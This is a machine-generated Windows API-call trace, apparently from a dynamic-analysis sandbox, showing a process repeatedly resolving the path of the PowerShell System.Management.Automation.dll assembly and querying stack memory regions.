	[0145.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.977] VirtualQuery (in: lpAddress=0x1caf30, lpBuffer=0x1cbdf0, dwLength=0x30 | out: lpBuffer=0x1cbdf0*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.978] VirtualQuery (in: lpAddress=0x1cafc0, lpBuffer=0x1cbe80, dwLength=0x30 | out: lpBuffer=0x1cbe80*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.978] VirtualQuery (in: lpAddress=0x1caf30, lpBuffer=0x1cbdf0, dwLength=0x30 | out: lpBuffer=0x1cbdf0*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.978] VirtualQuery (in: lpAddress=0x1cafc0, lpBuffer=0x1cbe80, dwLength=0x30 | out: lpBuffer=0x1cbe80*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.980] VirtualQuery (in: lpAddress=0x1caf30, lpBuffer=0x1cbdf0, dwLength=0x30 | out: lpBuffer=0x1cbdf0*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.980] VirtualQuery (in: lpAddress=0x1cafc0, lpBuffer=0x1cbe80, dwLength=0x30 | out: lpBuffer=0x1cbe80*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.981] VirtualQuery (in: lpAddress=0x1caf30, lpBuffer=0x1cbdf0, dwLength=0x30 | out: lpBuffer=0x1cbdf0*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.981] VirtualQuery (in: lpAddress=0x1cafc0, lpBuffer=0x1cbe80, dwLength=0x30 | out: lpBuffer=0x1cbe80*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.983] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.983] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.983] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.983] VirtualQuery (in: lpAddress=0x1cb9d0, lpBuffer=0x1cc890, dwLength=0x30 | out: lpBuffer=0x1cc890*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.983] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.983] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.985] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.985] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.985] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.985] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.985] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.985] VirtualQuery (in: lpAddress=0x1cb9d0, lpBuffer=0x1cc890, dwLength=0x30 | out: lpBuffer=0x1cc890*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
